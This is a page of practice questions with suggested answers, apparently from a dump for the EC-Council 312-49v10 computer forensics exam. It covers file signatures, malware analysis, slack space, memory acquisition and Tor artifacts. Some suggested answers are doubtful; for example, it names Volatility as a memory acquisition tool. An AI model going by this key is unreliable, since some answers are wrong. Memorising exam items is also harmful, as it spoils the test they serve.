ECCouncil 312-49v10 Practice Test - Questions Answers, Page 63

Jack is reviewing file headers to verify the file format and hopefully find more information about the file.

After a careful review of the data chunks through a hex editor, Jack finds the binary value 0xffd8ff.

Based on the above information, what type of format is the file/image saved as?

A. BMP
B. GIF
C. ASCII
D. JPEG
Suggested answer: D

Brian has the job of analyzing malware for a software security company. Brian has set up a virtual environment that includes virtual machines running various versions of OSes. Additionally, Brian has set up separated virtual networks within this environment. The virtual environment does not connect to the company's intranet, nor does it connect to the external Internet. With everything set up, Brian now received an executable file from a client that has undergone a cyberattack.

Brian ran the executable file in the virtual environment to see what it would do. What type of analysis did Brian perform?

A. Static malware analysis
B. Status malware analysis
C. Dynamic malware analysis
D. Static OS analysis
Suggested answer: C

When investigating a system, the forensics analyst discovers that malicious scripts were injected into benign and trusted websites. The attacker used a web application to send malicious code, in the form of a browser-side script, to a different end user. What attack was performed here?

A. Brute-force attack
B. Cookie poisoning attack
C. Cross-site scripting attack
D. SQL injection attack
Suggested answer: C

A file requires 10 KB of space to be saved on a hard disk partition. An entire cluster of 32 KB has been allocated for this file. The remaining, unused space of 22 KB in this cluster will be identified as ______.

A. Swap space
B. Cluster space
C. Slack space
D. Sector space
Suggested answer: C

Which of the following tools will allow a forensic investigator to acquire the memory dump of a suspect machine so that it may be investigated on a forensic workstation to collect evidentiary data like processes and Tor browser artifacts?

A. DB Browser SQLite
B. Bulk Extractor
C. Belkasoft Live RAM Capturer and AccessData FTK Imager
D. Hex Editor
Suggested answer: C

Which of the following statements pertaining to First Response is true?

A. First Response is a part of the investigation phase
B. First Response is a part of the post-investigation phase
C. First Response is a part of the pre-investigation phase
D. First Response is neither a part of the pre-investigation phase nor a part of the investigation phase. It only involves attending to a crime scene first and taking measures that assist forensic investigators in executing their tasks in the investigation phase more efficiently
Suggested answer: A

Consider a scenario where the perpetrator of a dark web crime has uninstalled Tor browser from their computer after committing the crime. The computer has been seized by law enforcement so they can investigate it for artifacts of Tor browser usage. Which of the following should the investigators examine to establish the use of Tor browser on the suspect machine?

A. Swap files
B. Files in Recycle Bin
C. Security logs
D. Prefetch files
Suggested answer: D

A cybercriminal is attempting to remove evidence from a Windows computer. He deletes the file evidence1.doc, sending it to the Windows Recycle Bin. The cybercriminal then empties the Recycle Bin.

After having been removed from the Recycle Bin, what will happen to the data?

A. The data will remain in its original clusters until it is overwritten
B. The data will be moved to new clusters in unallocated space
C. The data will become corrupted, making it unrecoverable
D. The data will be overwritten with zeroes
Suggested answer: A

Jeff is a forensics investigator for a government agency's cyber security office. Jeff is tasked with acquiring a memory dump of a Windows 10 computer that was involved in a DDoS attack on the government agency's web application. Jeff is onsite to collect the memory. What tool could Jeff use?

A. Volatility
B. Autopsy
C. RAM Mapper
D. Memcheck
Suggested answer: A

Derrick, a forensic specialist, was investigating an active computer that was executing various processes. Derrick wanted to check whether this system was used in an incident that occurred earlier. He started inspecting and gathering the contents of RAM, cache, and DLLs to identify incident signatures. Identify the data acquisition method employed by Derrick in the above scenario.

A. Dead data acquisition
B. Static data acquisition
C. Non-volatile data acquisition
D. Live data acquisition
Suggested answer: D